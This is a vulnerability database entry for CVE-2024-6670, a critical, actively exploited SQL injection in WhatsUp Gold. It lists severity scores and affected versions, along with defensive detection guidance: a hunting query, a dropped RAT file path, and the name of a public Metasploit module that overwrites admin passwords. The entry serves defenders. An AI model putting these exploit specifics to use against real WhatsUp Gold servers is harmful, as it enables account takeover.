cbcvebase.
CVE-2024-6670
published 2024-08-29

CVE-2024-6670: In WhatsUp Gold versions released before 2024.0.0, a SQL injection vulnerability allows an unauthenticated attacker to retrieve the user's encrypted password.

Priority: P1 (98) · critical · 9.8 (CVSS 3.1)
CVSS vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: KEV · ITW · EXPLOIT · Ransomware · Initial access
CISA Known Exploited Vulnerability, due 2024-10-07
Exploited in the wild
EPSS: 94.66% (99.8th percentile)

Affected

2 ranges

Vendor                        | Product      | Version range           | Fixed in
progress                      | whatsup_gold | < 24.0                  | 24.0
progress_software_corporation | whatsup_gold | >= 2023.1.0, < 2024.0.0 | 2024.0.0

Detection & IOCs (extracted from sources)

  • Use the following Trend Vision One / Endpoint Activity Data query to hunt for suspicious NmPoller.exe activity: "nmpoller.exe" AND eventSubId:(2 OR 101 OR 109 OR 901)
  • Detect the presence of ftpd32.exe in C:\programdata\ as a dropped RAT payload associated with post-exploitation activity following CVE-2024-6670 exploitation.
  • The Metasploit module auxiliary/admin/http/whatsup_gold_sqli.rb exploits CVE-2024-6670 by overwriting the password of an existing WhatsUp Gold user (e.g., the default admin account) via SQL injection. Detect exploitation attempts targeting WhatsUp Gold HTTP endpoints.
  • The exploit (as demonstrated by the public PoC) overwrites the administrator password rather than simply reading it, enabling full account takeover. Detection should account for unexpected password changes on admin accounts, not just data exfiltration.
  • NmPoller.exe process monitoring will also surface benign events such as product restarts and daily log file creation; baseline normal activity before alerting on all child process events.

CVSS provenance

nvd (v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck: 9.8 CRITICAL
cisa: 9.8 CRITICAL